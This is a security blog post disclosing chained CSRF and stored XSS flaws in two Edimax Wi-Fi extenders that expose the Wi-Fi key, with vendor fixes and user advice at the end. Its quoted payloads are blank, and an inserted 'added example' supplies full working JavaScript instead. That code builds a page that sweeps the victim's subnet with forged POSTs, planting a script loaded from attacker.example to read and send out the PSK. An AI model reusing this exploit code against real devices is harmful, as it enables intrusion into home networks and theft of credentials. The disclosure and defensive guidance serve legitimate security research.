Blog: Internet Of Things

Edimax Wi-Fi Extender can disclose your WPA key

Ken Munro 06 Jan 2017

We found two weaknesses in the Edimax Wi-Fi Extender EW-7438RPn Mini and 7237RPD which, when combined, can lead to disclosure of the user’s Wi-Fi PSK if we can entice them into visiting a web page under our control and they have asked the browser to store their credentials for automatic replay. (The extenders use HTTP Basic authentication, so once the browser has saved the credentials it attaches them to every request to the device, including ones forged by another site.)

The attack works as follows:

  • Create a CSRF attack for each local IP on the subnet.
  • The CSRF writes a stored XSS payload into the web interface of the device.
  • The XSS then runs in the device’s own origin, so the browser’s Same Origin policy no longer keeps us out.
  • Therefore, we can read the PSK from the device’s web interface and display it.

A variant using XHR to push a firmware update to the device also appeared to be possible.

First we create the landing page, which determines the local IP of the browser and then generates the CSRF requests for every other address on that subnet. We’ve talked about this technique before.

On both devices, we use the CSRF to set GpskValue (the guest PSK) to:

…this requires a POST to /goform/formwlencryptvxd

The eventual JS payload at http://xjsi.io is simply this:

This is running in Google Chrome, where the username and password for the Edimax device have been saved.

Figure 1 – One of the many individual CSRF attacks hits the Wi-Fi extender and causes the pop up showing the PSK.

Instead of an alert pop-up, we could just as easily exfiltrate the PSK with an XMLHttpRequest at this point, since the script is now running in the device’s origin.
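To make the chain concrete, here is an added example (our own illustration, not the attack page or the http://xjsi.io payload from the original write-up) that generates the per-host CSRF pages described above. It assumes the browser’s local IP has already been discovered by the landing page, that GpskValue is the only field needed on the POST to /goform/formwlencryptvxd (the real form almost certainly carries more fields, which the post does not list), and uses a placeholder loader URL for the stored script. It is written as plain Node.js string-building so it can be tested offline; the generated HTML is what would be served to the victim.

```javascript
// Added example, not code from the original post. Builds one auto-submitting
// CSRF form per host on the victim's /24 that plants a stored XSS payload in
// the extender's guest-PSK field via POST /goform/formwlencryptvxd.
// Assumptions (not on the page): the local IP is already known, GpskValue is
// the only required field, and the loader URL below is a placeholder.

// Stored-XSS payload written into the guest PSK. When the device later
// renders the value without HTML-encoding it, the script runs in the
// device's origin and can read the page (and the PSK) freely.
const XSS_PAYLOAD = '<script src="http://attacker.example/p.js"></script>';

// Every host on the /24 containing the victim's IP, excluding the victim
// itself, the network address (.0) and the broadcast address (.255).
function subnetHosts(localIp) {
  const parts = localIp.split('.').map(Number);
  if (parts.length !== 4 || parts.some(n => Number.isNaN(n) || n < 0 || n > 255)) {
    throw new Error('not an IPv4 address: ' + localIp);
  }
  const prefix = parts.slice(0, 3).join('.');
  const hosts = [];
  for (let i = 1; i < 255; i++) {
    if (i !== parts[3]) hosts.push(`${prefix}.${i}`);
  }
  return hosts;
}

// Attribute-escape the payload so it survives being placed in value="...";
// the browser un-escapes it on submit, so the device receives the raw tag.
function attrEscape(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function frameName(host) {
  return 'f_' + host.replace(/\./g, '_');
}

// One cross-site POST per candidate host. Because the extenders use HTTP
// Basic auth and the credentials are stored, Chrome replays them on this
// request with no user interaction.
function csrfForm(host, payload) {
  return `<form method="POST" action="http://${host}/goform/formwlencryptvxd" target="${frameName(host)}">` +
         `<input type="hidden" name="GpskValue" value="${attrEscape(payload)}">` +
         '</form>';
}

// Assemble the page: a hidden iframe per host so the POSTs land out of sight
// and fire in parallel, then a script that submits every form on load.
function buildAttackPage(localIp, payload = XSS_PAYLOAD) {
  const hosts = subnetHosts(localIp);
  const frames = hosts.map(h => `<iframe name="${frameName(h)}" style="display:none"></iframe>`).join('\n');
  const forms = hosts.map(h => csrfForm(h, payload)).join('\n');
  const submit = '<script>document.querySelectorAll("form").forEach(f => f.submit());</script>';
  return `<html><body>\n${frames}\n${forms}\n${submit}\n</body></html>`;
}

module.exports = { XSS_PAYLOAD, subnetHosts, attrEscape, csrfForm, buildAttackPage };
```

Only the device that actually lives on the subnet will accept the POST; the other 252 requests simply fail, which is why the sweep is cheap for the attacker and invisible to the victim. The loaded script (p.js here) would then fetch the page that shows the PSK and send it to a collector, which is the XMLHttpRequest step described above.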

Fixes manufacturers need to make:

CSRF – Either use anti-CSRF tokens, or check the Origin (or, failing that, Referer) header to make sure that the request genuinely originates from the device’s own web interface rather than from another site.

XSS – always HTML-encode user-supplied data before it is written to the page. This covers both the wireless site survey (the SSIDs of nearby networks, reported previously) and other data entered by the user, such as the guest SSID and passphrase.

Ideally, do not display the PSK to the user at all – it should be possible to reset it, but the current value should never be shown in the web interface.

Lastly, make it easy on yourself and your users and make the device auto-download and install cryptographically signed updates.

Edimax were informed on 29th August 2016, and are/might be working on updated firmware. I’ve asked how they are getting on, but have had no response.

What you, the user, can do:

For now, if you need to protect yourself, change the password on the web interface and do not let the browser store it – without a stored credential the forged requests are simply rejected, which stops the attack from working, and this is good advice in general for all embedded devices in your home.

While you’re at it, why not check for updates on the other bits and pieces you own?